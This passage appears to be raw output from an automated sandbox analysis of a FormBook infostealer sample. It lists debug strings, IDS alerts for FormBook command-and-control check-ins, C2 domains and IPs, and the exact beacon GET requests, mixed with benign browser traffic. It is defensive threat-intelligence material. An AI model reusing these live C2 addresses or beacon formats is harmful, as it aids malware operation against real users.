          Source: Binary string: iexplore.pdbUGP source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: gpC:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.CSharp.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbm source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb(s source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb.Ac source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbion~HC source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb2, T source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbtime@H] source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: iexplore.pdb source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_003626C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose, 6_2_003626C7
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 4x nop then pop esi 1_2_004172D9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 4x nop then pop esi 1_2_00417287
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 4x nop then pop edi 1_2_0040E46A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 4x nop then pop edi 1_2_00416CC5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

          Networking

          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49846 -> 66.29.149.193:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 3.33.130.190:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 38.174.75.236:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49853 -> 18.143.129.199:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49855 -> 15.197.142.173:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 91.195.240.19:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49860 -> 217.160.0.14:80
          Source: C:\Windows\explorer.exe Network Connect: 66.29.149.193 80
          Source: Malware configuration extractor URLs: www.venitro.com/gy14/
          Source: DNS query: www.mtdiyx.xyz
          Source: DNS query: www.169cc.xyz
          Source: DNS query: www.qieqyt.xyz
          Source: global traffic HTTP traffic detected: GET /gy14/?4hIPNj=pMF/70cK97I4N1zsxTPsXpV8M2aXG2v92n0Y4HwmOzYT3hc8E6pR6GODiKmxyANgrdJ8&3f=_jAPZR HTTP/1.1 Host: www.mtdiyx.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR HTTP/1.1 Host: www.venitro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /gy14/?4hIPNj=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&3f=_jAPZR HTTP/1.1 Host: www.aicashu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /gy14/?4hIPNj=6Pri5y0UMTrC/YK0G3cvyv6pjPPZbeJJYk0fOdV+Oxw8pn3IGe/8E0FD3PMHkDwd7eIO&3f=_jAPZR HTTP/1.1 Host: www.qieqyt.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
          Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
          Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
          Source: unknown TCP traffic detected without corresponding DNS query: 23.43.85.133
          Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.40
          Source: unknown TCP traffic detected without corresponding DNS query: 142.250.80.74
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exe Code function: 5_2_0FAAEF82 getaddrinfo,setsockopt,recv, 5_2_0FAAEF82
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AcO95oi6D0F4oCCXbuWOg_kTjmxw8s8dsTSOoPLH-9cazKIP4GZm10_AmRQBwhL1FQ_pwuVBiXNpeijzCuT90r5cABsKnZNHzbhDfTTzc3NFcLwgPYQKIyakH_oQpHvh_HsAxlKa5aSglzp_Czui1gLpPktRBAGI7iwW/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_77_2_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1717396960&P2=404&P3=2&P4=ULNdjLkH43bttteLUmqiTRcCoRkq8geCYsmFuW120olMpAB1hZlGSD7a5N19YXoBdeESSnvSJycFdjgdcmlLdA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: zAvZ1Ve+Lk5FaTZ3hfzK3dSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: code.jquery.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
          Source: global trafficHTTP traffic detected: GET /b?rn=1716792164814&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
          Source: global trafficHTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /ast/ast.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: acdn.adnxs.comConnection: Keep-Alive
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: msapplication.xml1.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x160ac525,0x01dab001</date><accdate>0x160d27ad,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml6.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1619a1f6,0x01dab001</date><accdate>0x161c1774,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4165323896.000001BA5D037000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185614018.000001BA5FDD0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185614018.000001BA5FDD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x16280dd2,0x01dab001</date><accdate>0x16280dd2,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000001D.00000002.4236924812.000000000CF98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Luka Doncic linked up with his former teammate and mentor Dirk Nowitzki before Game 3 of the Western Conference Finals.https://sports.yahoo.com/aces-waive-rookie-dyaisha-fair-after-debut-just-4-games-into-wnba-season-231809202.htmlhttps://www.basketballnetwork.net/old-school/when-shawn-kemp-blasted-sonics-after-they-gave-money-to-noname-center equals www.yahoo.com (Yahoo)
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/w equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.icoX equals www.myspace.com (Myspace)
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/favicon.icoGx equals www.rambler.ru (Rambler)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com//00 equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4187597827.000001BA61100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/p equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/ue:T equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: www.msn.com
          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
          Source: global trafficDNS traffic detected: DNS query: c.msn.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
          Source: global trafficDNS traffic detected: DNS query: acdn.adnxs.com
          Source: global trafficDNS traffic detected: DNS query: www.mtdiyx.xyz
          Source: global trafficDNS traffic detected: DNS query: www.169cc.xyz
          Source: global trafficDNS traffic detected: DNS query: www.mosaica.online
          Source: global trafficDNS traffic detected: DNS query: www.venitro.com
          Source: global trafficDNS traffic detected: DNS query: www.techn9nehollywoodundead.com
          Source: global trafficDNS traffic detected: DNS query: www.aicashu.com
          Source: global trafficDNS traffic detected: DNS query: www.qieqyt.xyz
          Source: global trafficDNS traffic detected: DNS query: www.tryscriptify.com
          Source: global trafficDNS traffic detected: DNS query: www.naples.beauty
          Source: global trafficDNS traffic detected: DNS query: www.6733633.com
          Source: global trafficDNS traffic detected: DNS query: www.camelpmkrf.com
          Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 06:43:11 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/html
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://amazon.fr/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.icom
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/6
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.buscape.com.br/
